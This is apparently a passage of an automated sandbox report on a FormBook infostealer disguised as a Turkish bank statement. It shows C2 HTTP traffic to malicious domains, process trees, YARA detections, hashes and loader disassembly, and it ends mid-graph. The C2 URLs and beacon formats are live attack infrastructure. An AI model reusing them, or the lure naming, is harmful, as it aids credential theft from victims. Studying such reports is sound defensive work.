                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.74972866.96.162.14980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:43:03.306972980 CET355OUTGET /ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt HTTP/1.1
                                                Host: www.genuineinsights.cloud
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 15, 2023 08:43:03.422291994 CET356INHTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:43:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 867
                                                Connection: close
                                                Server: Apache/2
                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                Accept-Ranges: bytes
                                                Age: 0
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.749729198.54.117.21580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:43:08.648824930 CET357OUTPOST /ghii/ HTTP/1.1
                                                Host: www.octohoki.net
                                                Connection: close
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Origin: http://www.octohoki.net
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.octohoki.net/ghii/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 78 4d 6a 6e 66 4e 2d 59 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 49 30 31 6e 71 5a 39 4d 68 37 4f 2d 58 79 55 2d 50 6a 70 4c 66 61 41 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: xMjnfN-Y=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmI01nqZ9Mh7O-XyU-PjpLfaA.
                                                Feb 15, 2023 08:43:08.823725939 CET358INHTTP/1.1 405 Not Allowed
                                                Date: Wed, 15 Feb 2023 07:43:08 GMT
                                                Content-Type: text/html
                                                Content-Length: 154
                                                Connection: close
                                                Server: namecheap-nginx
                                                Allow: GET, HEAD
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.749730198.54.117.21580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 15, 2023 08:43:11.353362083 CET359OUTGET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h HTTP/1.1
                                                Host: www.octohoki.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:08:41:09
                                                Start date:15/02/2023
                                                Path:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                Imagebase:0x400000
                                                File size:311919 bytes
                                                MD5 hash:D668AE995548E2DC9B3193CB59AC9C02
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Target ID:1
                                                Start time:08:41:09
                                                Start date:15/02/2023
                                                Path:C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i
                                                Imagebase:0x10a0000
                                                File size:143360 bytes
                                                MD5 hash:7719839B64AEF3F35ABECB784C0BDB46
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 13%, ReversingLabs
                                                Reputation:low

                                                General

                                                Target ID:2
                                                Start time:08:41:10
                                                Start date:15/02/2023
                                                Path:C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe
                                                Imagebase:0x10a0000
                                                File size:143360 bytes
                                                MD5 hash:7719839B64AEF3F35ABECB784C0BDB46
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                Reputation:low

                                                General

                                                Target ID:3
                                                Start time:08:41:16
                                                Start date:15/02/2023
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff75ed40000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:9
                                                Start time:08:41:33
                                                Start date:15/02/2023
                                                Path:C:\Windows\SysWOW64\wlanext.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                Imagebase:0x8a0000
                                                File size:78848 bytes
                                                MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                Reputation:moderate

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:15.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.5%
                                                  Total number of Nodes:1379
                                                  Total number of Limit Nodes:25
                                                  execution_graph 3219 403640 SetErrorMode GetVersionExW 3220 403692 GetVersionExW 3219->3220 3221 4036ca 3219->3221 3220->3221 3222 403723 3221->3222 3223 406a35 5 API calls 3221->3223 3309 4069c5 GetSystemDirectoryW 3222->3309 3223->3222 3225 403739 lstrlenA 3225->3222 3226 403749 3225->3226 3312 406a35 GetModuleHandleA 3226->3312 3229 406a35 5 API calls 3230 403757 3229->3230 3231 406a35 5 API calls 3230->3231 3232 403763 #17 OleInitialize SHGetFileInfoW 3231->3232 3318 406668 lstrcpynW 3232->3318 3235 4037b0 GetCommandLineW 3319 406668 lstrcpynW 3235->3319 3237 4037c2 3320 405f64 3237->3320 3240 4038f7 3241 40390b GetTempPathW 3240->3241 3324 40360f 3241->3324 3243 403923 3245 403927 GetWindowsDirectoryW lstrcatW 3243->3245 3246 40397d DeleteFileW 3243->3246 3244 405f64 CharNextW 3248 4037f9 3244->3248 3249 40360f 12 API calls 3245->3249 3334 4030d0 GetTickCount GetModuleFileNameW 3246->3334 3248->3240 3248->3244 3253 4038f9 3248->3253 3251 403943 3249->3251 3250 403990 3254 403b6c ExitProcess OleUninitialize 3250->3254 3256 403a45 3250->3256 3263 405f64 CharNextW 3250->3263 3251->3246 3252 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3251->3252 3255 40360f 12 API calls 3252->3255 3420 406668 lstrcpynW 3253->3420 3258 403b91 3254->3258 3259 403b7c 3254->3259 3262 403975 3255->3262 3364 403d17 3256->3364 3260 403b99 GetCurrentProcess OpenProcessToken 3258->3260 3261 403c0f ExitProcess 3258->3261 3474 405cc8 3259->3474 3266 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3260->3266 3267 403bdf 3260->3267 3262->3246 3262->3254 3278 4039b2 3263->3278 3266->3267 3271 406a35 5 API calls 3267->3271 3268 403a54 3268->3254 3274 403be6 3271->3274 3272 403a1b 3421 40603f 3272->3421 3273 403a5c 3437 405c33 3273->3437 3276 403bfb ExitWindowsEx 3274->3276 3280 403c08 3274->3280 3276->3261 3276->3280 3278->3272 3278->3273 3478 40140b 3280->3478 3283 403a72 lstrcatW 3284 403a7d lstrcatW lstrcmpiW 3283->3284 3284->3268 3285 403a9d 3284->3285 3287 403aa2 3285->3287 3288 403aa9 3285->3288 3440 405b99 CreateDirectoryW 3287->3440 3445 405c16 CreateDirectoryW 3288->3445 3289 403a3a 3436 406668 lstrcpynW 3289->3436 3294 403aae SetCurrentDirectoryW 3295 403ac0 3294->3295 3296 403acb 3294->3296 3448 406668 lstrcpynW 3295->3448 3449 406668 lstrcpynW 3296->3449 3301 403b19 CopyFileW 3305 403ad8 3301->3305 3302 403b63 3304 406428 36 API calls 3302->3304 3304->3268 3305->3302 3306 4066a5 17 API calls 3305->3306 3308 403b4d CloseHandle 3305->3308 3450 4066a5 3305->3450 3467 406428 MoveFileExW 3305->3467 3471 405c4b CreateProcessW 3305->3471 3306->3305 3308->3305 3311 4069e7 wsprintfW LoadLibraryExW 3309->3311 3311->3225 3313 406a51 3312->3313 3314 406a5b GetProcAddress 3312->3314 3315 4069c5 3 API calls 3313->3315 3316 403750 3314->3316 3317 406a57 3315->3317 3316->3229 3317->3314 3317->3316 3318->3235 3319->3237 3321 405f6a 3320->3321 3322 4037e8 CharNextW 3321->3322 3323 405f71 CharNextW 3321->3323 3322->3248 3323->3321 3481 4068ef 3324->3481 3326 403625 3326->3243 3327 40361b 3327->3326 3490 405f37 lstrlenW CharPrevW 3327->3490 3330 405c16 2 API calls 3331 403633 3330->3331 3493 406187 3331->3493 3497 406158 GetFileAttributesW CreateFileW 3334->3497 3336 403113 3363 403120 3336->3363 3498 406668 lstrcpynW 3336->3498 3338 403136 3499 405f83 lstrlenW 3338->3499 3342 403147 GetFileSize 3343 403241 3342->3343 3362 40315e 3342->3362 3504 40302e 3343->3504 3347 403286 GlobalAlloc 3350 40329d 3347->3350 3349 4032de 3352 40302e 32 API calls 3349->3352 3354 406187 2 API calls 3350->3354 3351 403267 3353 4035e2 ReadFile 3351->3353 3352->3363 3355 403272 3353->3355 3357 4032ae CreateFileW 3354->3357 3355->3347 3355->3363 3356 40302e 32 API calls 3356->3362 3358 4032e8 3357->3358 3357->3363 3519 4035f8 SetFilePointer 3358->3519 3360 4032f6 3520 403371 3360->3520 3362->3343 3362->3349 3362->3356 3362->3363 3535 4035e2 3362->3535 3363->3250 3365 406a35 5 API calls 3364->3365 3366 403d2b 3365->3366 3367 403d31 3366->3367 3368 403d43 3366->3368 3590 4065af wsprintfW 3367->3590 3591 406536 3368->3591 3371 403d92 lstrcatW 3374 403d41 3371->3374 3373 406536 3 API calls 3373->3371 3582 403fed 3374->3582 3377 40603f 18 API calls 3378 403dc4 3377->3378 3379 403e58 3378->3379 3381 406536 3 API calls 3378->3381 3380 40603f 18 API calls 3379->3380 3382 403e5e 3380->3382 3383 403df6 3381->3383 3384 403e6e LoadImageW 3382->3384 3387 4066a5 17 API calls 3382->3387 3383->3379 3390 403e17 lstrlenW 3383->3390 3394 405f64 CharNextW 3383->3394 3385 403f14 3384->3385 3386 403e95 RegisterClassW 3384->3386 3389 40140b 2 API calls 3385->3389 3388 403ecb SystemParametersInfoW CreateWindowExW 3386->3388 3419 403f1e 3386->3419 3387->3384 3388->3385 3393 403f1a 3389->3393 3391 403e25 lstrcmpiW 3390->3391 3392 403e4b 3390->3392 3391->3392 3395 403e35 GetFileAttributesW 3391->3395 3396 405f37 3 API calls 3392->3396 3399 403fed 18 API calls 3393->3399 3393->3419 3397 403e14 3394->3397 3398 403e41 3395->3398 3400 403e51 3396->3400 3397->3390 3398->3392 3401 405f83 2 API calls 3398->3401 3402 403f2b 3399->3402 3596 406668 lstrcpynW 3400->3596 3401->3392 3404 403f37 ShowWindow 3402->3404 3405 403fba 3402->3405 3407 4069c5 3 API calls 3404->3407 3597 40579d OleInitialize 3405->3597 3409 403f4f 3407->3409 3408 403fc0 3410 403fc4 3408->3410 3411 403fdc 3408->3411 3412 403f5d GetClassInfoW 3409->3412 3414 4069c5 3 API calls 3409->3414 3418 40140b 2 API calls 3410->3418 3410->3419 3413 40140b 2 API calls 3411->3413 3415 403f71 GetClassInfoW RegisterClassW 3412->3415 3416 403f87 DialogBoxParamW 3412->3416 3413->3419 3414->3412 3415->3416 3417 40140b 2 API calls 3416->3417 3417->3419 3418->3419 3419->3268 3420->3241 3619 406668 lstrcpynW 3421->3619 3423 406050 3620 405fe2 CharNextW CharNextW 3423->3620 3426 403a27 3426->3254 3435 406668 lstrcpynW 3426->3435 3427 4068ef 5 API calls 3433 406066 3427->3433 3428 406097 lstrlenW 3429 4060a2 3428->3429 3428->3433 3430 405f37 3 API calls 3429->3430 3432 4060a7 GetFileAttributesW 3430->3432 3432->3426 3433->3426 3433->3428 3434 405f83 2 API calls 3433->3434 3626 40699e FindFirstFileW 3433->3626 3434->3428 3435->3289 3436->3256 3438 406a35 5 API calls 3437->3438 3439 403a61 lstrcatW 3438->3439 3439->3283 3439->3284 3441 405bea GetLastError 3440->3441 3442 403aa7 3440->3442 3441->3442 3443 405bf9 SetFileSecurityW 3441->3443 3442->3294 3443->3442 3444 405c0f GetLastError 3443->3444 3444->3442 3446 405c26 3445->3446 3447 405c2a GetLastError 3445->3447 3446->3294 3447->3446 3448->3296 3449->3305 3454 4066b2 3450->3454 3451 4068d5 3452 403b0d DeleteFileW 3451->3452 3631 406668 lstrcpynW 3451->3631 3452->3301 3452->3305 3454->3451 3455 4068a3 lstrlenW 3454->3455 3458 406536 3 API calls 3454->3458 3459 4066a5 10 API calls 3454->3459 3460 4067ba GetSystemDirectoryW 3454->3460 3461 4067cd GetWindowsDirectoryW 3454->3461 3462 4067fc SHGetSpecialFolderLocation 3454->3462 3463 4066a5 10 API calls 3454->3463 3464 406844 lstrcatW 3454->3464 3465 4068ef 5 API calls 3454->3465 3629 4065af wsprintfW 3454->3629 3630 406668 lstrcpynW 3454->3630 3455->3454 3458->3454 3459->3455 3460->3454 3461->3454 3462->3454 3466 406814 SHGetPathFromIDListW CoTaskMemFree 3462->3466 3463->3454 3464->3454 3465->3454 3466->3454 3468 40643c 3467->3468 3470 406449 3467->3470 3632 4062ae 3468->3632 3470->3305 3472 405c8a 3471->3472 3473 405c7e CloseHandle 3471->3473 3472->3305 3473->3472 3475 405cdd 3474->3475 3476 403b89 ExitProcess 3475->3476 3477 405cf1 MessageBoxIndirectW 3475->3477 3477->3476 3479 401389 2 API calls 3478->3479 3480 401420 3479->3480 3480->3261 3487 4068fc 3481->3487 3482 406977 CharPrevW 3483 406972 3482->3483 3483->3482 3485 406998 3483->3485 3484 406965 CharNextW 3484->3483 3484->3487 3485->3327 3486 405f64 CharNextW 3486->3487 3487->3483 3487->3484 3487->3486 3488 406951 CharNextW 3487->3488 3489 406960 CharNextW 3487->3489 3488->3487 3489->3484 3491 405f53 lstrcatW 3490->3491 3492 40362d 3490->3492 3491->3492 3492->3330 3494 406194 GetTickCount GetTempFileNameW 3493->3494 3495 40363e 3494->3495 3496 4061ca 3494->3496 3495->3243 3496->3494 3496->3495 3497->3336 3498->3338 3500 405f91 3499->3500 3501 40313c 3500->3501 3502 405f97 CharPrevW 3500->3502 3503 406668 lstrcpynW 3501->3503 3502->3500 3502->3501 3503->3342 3505 403057 3504->3505 3506 40303f 3504->3506 3509 403067 GetTickCount 3505->3509 3510 40305f 3505->3510 3507 403048 DestroyWindow 3506->3507 3508 40304f 3506->3508 3507->3508 3508->3347 3508->3363 3538 4035f8 SetFilePointer 3508->3538 3509->3508 3511 403075 3509->3511 3539 406a71 3510->3539 3513 4030aa CreateDialogParamW ShowWindow 3511->3513 3514 40307d 3511->3514 3513->3508 3514->3508 3543 403012 3514->3543 3516 40308b wsprintfW 3546 4056ca 3516->3546 3519->3360 3521 403380 SetFilePointer 3520->3521 3522 40339c 3520->3522 3521->3522 3557 403479 GetTickCount 3522->3557 3527 403479 42 API calls 3528 4033d3 3527->3528 3529 40343f ReadFile 3528->3529 3533 4033e2 3528->3533 3534 403439 3528->3534 3529->3534 3531 4061db ReadFile 3531->3533 3533->3531 3533->3534 3572 40620a WriteFile 3533->3572 3534->3363 3536 4061db ReadFile 3535->3536 3537 4035f5 3536->3537 3537->3362 3538->3351 3540 406a8e PeekMessageW 3539->3540 3541 406a84 DispatchMessageW 3540->3541 3542 406a9e 3540->3542 3541->3540 3542->3508 3544 403021 3543->3544 3545 403023 MulDiv 3543->3545 3544->3545 3545->3516 3548 4056e5 3546->3548 3556 4030a8 3546->3556 3547 405701 lstrlenW 3550 40572a 3547->3550 3551 40570f lstrlenW 3547->3551 3548->3547 3549 4066a5 17 API calls 3548->3549 3549->3547 3553 405730 SetWindowTextW 3550->3553 3554 40573d 3550->3554 3552 405721 lstrcatW 3551->3552 3551->3556 3552->3550 3553->3554 3555 405743 SendMessageW SendMessageW SendMessageW 3554->3555 3554->3556 3555->3556 3556->3508 3558 4035d1 3557->3558 3559 4034a7 3557->3559 3560 40302e 32 API calls 3558->3560 3574 4035f8 SetFilePointer 3559->3574 3567 4033a3 3560->3567 3562 4034b2 SetFilePointer 3566 4034d7 3562->3566 3563 4035e2 ReadFile 3563->3566 3565 40302e 32 API calls 3565->3566 3566->3563 3566->3565 3566->3567 3568 40620a WriteFile 3566->3568 3569 4035b2 SetFilePointer 3566->3569 3575 406bb0 3566->3575 3567->3534 3570 4061db ReadFile 3567->3570 3568->3566 3569->3558 3571 4033bc 3570->3571 3571->3527 3571->3534 3573 406228 3572->3573 3573->3533 3574->3562 3576 406bd5 3575->3576 3577 406bdd 3575->3577 3576->3566 3577->3576 3578 406c64 GlobalFree 3577->3578 3579 406c6d GlobalAlloc 3577->3579 3580 406ce4 GlobalAlloc 3577->3580 3581 406cdb GlobalFree 3577->3581 3578->3579 3579->3576 3579->3577 3580->3576 3580->3577 3581->3580 3583 404001 3582->3583 3604 4065af wsprintfW 3583->3604 3585 404072 3605 4040a6 3585->3605 3587 403da2 3587->3377 3588 404077 3588->3587 3589 4066a5 17 API calls 3588->3589 3589->3588 3590->3374 3608 4064d5 3591->3608 3594 403d73 3594->3371 3594->3373 3595 40656a RegQueryValueExW RegCloseKey 3595->3594 3596->3379 3612 404610 3597->3612 3599 4057e7 3600 404610 SendMessageW 3599->3600 3601 4057f9 OleUninitialize 3600->3601 3601->3408 3603 4057c0 3603->3599 3615 401389 3603->3615 3604->3585 3606 4066a5 17 API calls 3605->3606 3607 4040b4 SetWindowTextW 3606->3607 3607->3588 3609 4064e4 3608->3609 3610 4064ed RegOpenKeyExW 3609->3610 3611 4064e8 3609->3611 3610->3611 3611->3594 3611->3595 3613 404628 3612->3613 3614 404619 SendMessageW 3612->3614 3613->3603 3614->3613 3617 401390 3615->3617 3616 4013fe 3616->3603 3617->3616 3618 4013cb MulDiv SendMessageW 3617->3618 3618->3617 3619->3423 3621 405fff 3620->3621 3623 406011 3620->3623 3621->3623 3624 40600c CharNextW 3621->3624 3622 406035 3622->3426 3622->3427 3623->3622 3625 405f64 CharNextW 3623->3625 3624->3622 3625->3623 3627 4069b4 FindClose 3626->3627 3628 4069bf 3626->3628 3627->3628 3628->3433 3629->3454 3630->3454 3631->3452 3633 406304 GetShortPathNameW 